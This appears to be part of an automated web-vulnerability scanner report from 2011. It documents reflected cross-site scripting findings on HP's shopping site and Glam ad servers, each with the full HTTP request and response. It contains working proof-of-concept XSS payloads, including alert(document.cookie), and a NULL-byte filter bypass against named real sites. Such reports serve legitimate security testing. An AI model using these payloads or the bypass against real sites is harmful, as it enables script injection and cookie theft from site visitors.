Cookie: hpcssprint15ab=0; hptest20110224a=hpcssprint15ab0; prop12=r163; s_vi=[CS]v1|26C3B9CA85010E69-40000115404909BA[CE]; HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054; hpshopping=1&user_id=0; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; h_cm=i; hpcompc_usen=cartExists=false; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Aseries%3Adesktops%3Ahigh%20performance; jumpstack=%5B%5B're_r602_prodexp%2Fhpcom%2Fpsg%2Fdesktops%2F'%2C'1300722626609'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance'%2C'1300722630717'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=2x2x26; s_sq=hphqglobal%2Chphqglobaljan11testa%2Chphqhhostorejan11testa%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aseries%25253Adesktops%25253Ahigh%252520performance%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location%25253D'http%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fcomputer_can_seri%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 15:51:42 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=0&home_slot_1=XX096AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2FHPE590t_series&home_slot_1_Affix=GS&cart_id=1595239746; expires=Tuesday, 19-Jul-2011 15:51:42 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Tuesday, 19-Jul-2011 15:51:42 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241821

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<script language="JavaScript">

checkTab();
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/desktops/High_performance/HPE590t_series3664b';a597c8e47c7|HP Pavilion Elite HPE-590t series';
var s_prop21 = 'null|desktops|HPE590t_series|2|';

/* Script added to introduce New Omniture Variables */

// PVCS Fix #23259 - omni_v1 was replaced
...[SNIP]...

2.61. http://www.shopping.hp.com/webapp/shopping/cto.do [can_params parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/cto.do

Issue detail

The value of the can_params request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5249e'><script>alert(1)</script>1254459d51bedd78b was submitted in the can_params parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /webapp/shopping/cto.do?destination=components&eppPrefix=&productId=XX096AV%23ABA&parentCompId=&doBvPricing=true&doBvPageData=true&doBvParamData=true&reconfig=false&category=desktops%2FHPE590t_series&can_params=%26a1%3DCategory%26v1%3DHigh+performance5249e'><script>alert(1)</script>1254459d51bedd78b&v1=High+performance HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&category=desktops&a1=Category&v1=High+performance&series_name=HPE590t_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance/HPE590t_series
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcssprint15ab=0; hptest20110224a=hpcssprint15ab0; prop12=r163; s_vi=[CS]v1|26C3B9CA85010E69-40000115404909BA[CE]; HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; h_cm=i; hpshopping=1&user_id=0&home_slot_1=XX096AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2FHPE590t_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance%2Fhpe590t_series; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asdp%3Adesktops%3Ahigh%20performance%3Ahpe590t_series; jumpstack=%5B%5B're_r602_prodexp%2Fhpcom%2Fpsg%2Fdesktops%2F'%2C'1300722626609'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance'%2C'1300722630717'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance%2Fhpe590t_series'%2C'1300722656472'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=3x3x29; s_sq=hphqglobal%2Chphqglobaljan11testa%2Chphqhhostorejan11testa%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Ahigh%252520performance%25253Ahpe590t_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BdefaultConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 15:51:48 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=0ncwNH0J2TCg4LBkGJqY1Py7WfLch2pYRp0pyTWP5BxYBTXGC1s2!-86705054; expires=Tuesday, 22-Mar-2011 15:51:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Tuesday, 19-Jul-2011 15:51:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 186936

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<style type="te
...[SNIP]...
<a href='http://www.shopping.hp.com/webapp/shopping/computer_series.do?storeName=computer_store&category=desktops&series_name=HPE590t_series&a1=Category&v1=High performance5249e'><script>alert(1)</script>1254459d51bedd78b' class="udrline">
...[SNIP]...

2.62. http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/cto.do

Issue detail

The value of the eppPrefix request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f077c"%20a%3db%20b5ac17cf235 was submitted in the eppPrefix parameter. This input was echoed as f077c" a=b b5ac17cf235 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /webapp/shopping/cto.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&category=desktops&a1=Category&v1=High+performance&series_name=HPE590t_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance/HPE590t_series
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcssprint15ab=0; hptest20110224a=hpcssprint15ab0; prop12=r163; s_vi=[CS]v1|26C3B9CA85010E69-40000115404909BA[CE]; HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; h_cm=i; hpshopping=1&user_id=0&home_slot_1=XX096AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2FHPE590t_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance%2Fhpe590t_series; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asdp%3Adesktops%3Ahigh%20performance%3Ahpe590t_series; jumpstack=%5B%5B're_r602_prodexp%2Fhpcom%2Fpsg%2Fdesktops%2F'%2C'1300722626609'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance'%2C'1300722630717'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance%2Fhpe590t_series'%2C'1300722656472'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=3x3x29; s_sq=hphqglobal%2Chphqglobaljan11testa%2Chphqhhostorejan11testa%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Ahigh%252520performance%25253Ahpe590t_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BdefaultConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 247

destination=components&eppPrefix=f077c"%20a%3db%20b5ac17cf235&productId=XX096AV%23ABA&parentCompId=&doBvPricing=true&doBvPageData=true&doBvParamData=true&reconfig=false&category=desktops%2FHPE590t_series&can_params=%26a1%3DCategory%26v1%3DHigh+performance&v1=Hi
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 15:51:31 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Tuesday, 19-Jul-2011 15:51:31 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 187019

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<style type="te
...[SNIP]...
<a href="javascript:openWin('/webapp/shopping/cto/needItSooner.do?category=desktops/HPE590t_series&productId=XX096AV%23ABA&eppPrefix=f077c" a=b b5ac17cf235&brandName=hp',650,550);">
...[SNIP]...

2.63. http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/cto.do

Issue detail

The value of the eppPrefix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c6b"%3bd8180e6df4c was submitted in the eppPrefix parameter. This input was echoed as 36c6b";d8180e6df4c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

POST /webapp/shopping/cto.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&category=desktops&a1=Category&v1=High+performance&series_name=HPE590t_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance/HPE590t_series
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcssprint15ab=0; hptest20110224a=hpcssprint15ab0; prop12=r163; s_vi=[CS]v1|26C3B9CA85010E69-40000115404909BA[CE]; HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; h_cm=i; hpshopping=1&user_id=0&home_slot_1=XX096AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2FHPE590t_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance%2Fhpe590t_series; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asdp%3Adesktops%3Ahigh%20performance%3Ahpe590t_series; jumpstack=%5B%5B're_r602_prodexp%2Fhpcom%2Fpsg%2Fdesktops%2F'%2C'1300722626609'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance'%2C'1300722630717'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance%2Fhpe590t_series'%2C'1300722656472'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=3x3x29; s_sq=hphqglobal%2Chphqglobaljan11testa%2Chphqhhostorejan11testa%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Ahigh%252520performance%25253Ahpe590t_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BdefaultConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 247

destination=components&eppPrefix=36c6b"%3bd8180e6df4c&productId=XX096AV%23ABA&parentCompId=&doBvPricing=true&doBvPageData=true&doBvParamData=true&reconfig=false&category=desktops%2FHPE590t_series&can_params=%26a1%3DCategory%26v1%3DHigh+performance&v1=Hi
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 15:51:34 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=0&home_slot_1=XX096AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2FHPE590t_series&home_slot_1_Affix=GS&cart_id=1595239746; expires=Tuesday, 19-Jul-2011 15:51:35 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Tuesday, 19-Jul-2011 15:51:35 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 197933

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<style type="te
...[SNIP]...
yId('save_msg').innerHTML = msg;
return true;
}

params += "fromEmailAddress=" + fromEmailAddress.value + "&";
params += "ctoDescription=" + ctoDescription.value + "&" ;
params += "eppPrefix=36c6b";d8180e6df4c&";
params += "catpath=desktops/HPE590t_series&";
params += "productId=XX096AV%23ABA";
cto_user_id = fromEmailAddress.value;
//alert("with Params: " + params);
SendHttpRequest('save_configura
...[SNIP]...

2.64. http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/cto.do

Issue detail

The value of the eppPrefix request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5be67'%3b2f93dc1bf10 was submitted in the eppPrefix parameter. This input was echoed as 5be67';2f93dc1bf10 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

POST /webapp/shopping/cto.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&category=desktops&a1=Category&v1=High+performance&series_name=HPE590t_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance/HPE590t_series
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcssprint15ab=0; hptest20110224a=hpcssprint15ab0; prop12=r163; s_vi=[CS]v1|26C3B9CA85010E69-40000115404909BA[CE]; HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; h_cm=i; hpshopping=1&user_id=0&home_slot_1=XX096AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2FHPE590t_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance%2Fhpe590t_series; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asdp%3Adesktops%3Ahigh%20performance%3Ahpe590t_series; jumpstack=%5B%5B're_r602_prodexp%2Fhpcom%2Fpsg%2Fdesktops%2F'%2C'1300722626609'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance'%2C'1300722630717'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fhigh_performance%2Fhpe590t_series'%2C'1300722656472'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=3x3x29; s_sq=hphqglobal%2Chphqglobaljan11testa%2Chphqhhostorejan11testa%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Ahigh%252520performance%25253Ahpe590t_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BdefaultConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 247

destination=components&eppPrefix=5be67'%3b2f93dc1bf10&productId=XX096AV%23ABA&parentCompId=&doBvPricing=true&doBvPageData=true&doBvParamData=true&reconfig=false&category=desktops%2FHPE590t_series&can_params=%26a1%3DCategory%26v1%3DHigh+performance&v1=Hi
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 15:51:36 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=0&home_slot_1=XX096AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2FHPE590t_series&home_slot_1_Affix=GS&cart_id=1595239746; expires=Tuesday, 19-Jul-2011 15:51:37 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Tuesday, 19-Jul-2011 15:51:37 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 198164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<style type="te
...[SNIP]...
ew Array();
var selectionList = new Array();
var timeOutURL = 'http://www.shopping.hp.com/webapp/shopping/home.do';

var helpmeDecideWindowObj = null;

//BA-Q3: variables declaration
var eppPrefix = '5be67';2f93dc1bf10';
var s_prop32 = '';
var s_prop33 = '';
var s_eVar32 = '';
var s_eVar33 = '';
var s_eVar34 = '';
var s_events = '';
var s_products = '';
var confType = '';
var isMainSite = false;
var sentInitConfigF
...[SNIP]...

2.65. http://www.shopping.hp.com/webapp/shopping/series_can.do [jumpid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/series_can.do

Issue detail

The value of the jumpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 548a4'%3b3b93c8d5819 was submitted in the jumpid parameter. This input was echoed as 548a4';3b93c8d5819 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /webapp/shopping/series_can.do;HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054?storeName=computer_store&landing=desktops&a1=Category&v1=High+performance&jumpid=in_R329_prodexp/hhoslp/psg/desktops/High_performance548a4'%3b3b93c8d5819 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=landing&landing=desktops
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcssprint15ab=0; hptest20110224a=hpcssprint15ab0; prop12=r163; s_vi=[CS]v1|26C3B9CA85010E69-40000115404909BA[CE]; HHOJSID=Tv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1QsJY0LHsZ0lmpS8Xh1J!-86705054; hpshopping=1&user_id=0; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; h_cm=i; EMID=; s_depth=2; s_var_20=re_r602_prodexp%2Fhpcom%2Fpsg%2Fdesktops%2F; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B're_r602_prodexp%2Fhpcom%2Fpsg%2Fdesktops%2F'%2C'1300722626609'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=1x1x2; s_sq=hphqglobal%2Chphqglobaljan11testa%2Chphqhhostorejan11testa%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fseries_can.do%25253BHHOJSID%25253DTv9hNHzJvhwqk19vvdCCvnnvzfGtQ9Qt1Qs%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 15:51:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Tuesday, 19-Jul-2011 15:51:04 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 216546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
(omni_v1)) omni_v1 = 'none';

var s_prop21 = '|' + omni_category + '|' + omni_catLevel + '|' + omni_subcat1;
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/desktops/High_performance548a4';3b93c8d5819|';
var s_channel = omni_landing;
var s_prop25 = omni_landing + ':' + omni_v1;
var s_pageName = 'hho:gs:landing:series:' + omni_landing + ':' + omni_v1;
if (s_pageName != null) s_pag
...[SNIP]...

2.66. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The value of the adSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6d98'%3balert(1)//e11e50a0d00 was submitted in the adSize parameter. This input was echoed as f6d98';alert(1)//e11e50a0d00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1621082087&adSize=300x250f6d98'%3balert(1)//e11e50a0d00 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(document.cookie)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=1126612978600458511; ctags=None

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: application/x-javascript
Set-Cookie: bkpix2=1; expires=Mon, 21 Mar 2011 22:15:28 GMT; path=/; domain=.glam.com;
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Vary: Accept-Encoding
Cache-Control: max-age=450
Date: Mon, 21 Mar 2011 16:42:08 GMT
Connection: close
Content-Length: 55382

// 
// 

window.glam_session = new Object();
window.glam_session.country
...[SNIP]...
i.com/site/2312" height="0" width="0" border="0">');

function GlamProcessScriptParams()
{

}

window.glam_affiliate_id = '1621082087';
window.glam_zone = '';
window.glam_ad_size = '300x250f6d98';alert(1)//e11e50a0d00';
window.glam_status = '';
window.glam_status = (window.glam_status==''?null:window.glam_status);

/*
*/

function GlamShowCustomDefaultAd(zone, adSize) {}
window.glam_affiliate_info = new Array();
...[SNIP]...

2.67. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The value of the ;flg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77751'%3balert(1)//57a9c84bae4 was submitted in the ;flg parameter. This input was echoed as 77751';alert(1)//57a9c84bae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=g;cc=us;aft=p;ec=ron;p=0;p=1;!c=fem;!c=nptr;!c=r;!c=s;!c=sf;ec=tfm;ec=tpa;pec=fm;rmt=exp;rtbp=1;vec=fm;vpec=fm;atf=1;uatf=s;pfl=0;dt=s;!c=hagl;!c=hagn;afid=1621082087;dsid=1027200;;tt=j;u=b0021heurbg1oh7qpt9,f0f12sa,g10001s;sz=300x250;tile=1;ord=6778163411654532;;afid=1621082087;dsid=1027200;url=zetcbm;seq=1;ux=f-f12sa,tid-1,pid-heurbg1oh7qpt9,aid-2,g-64,1,;_glt=300:1:11:42:25:539:2011:3:21;a_tz=-300;_g_cv=2;77751'%3balert(1)//57a9c84bae4 HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(document.cookie)//c18ae8de3b0
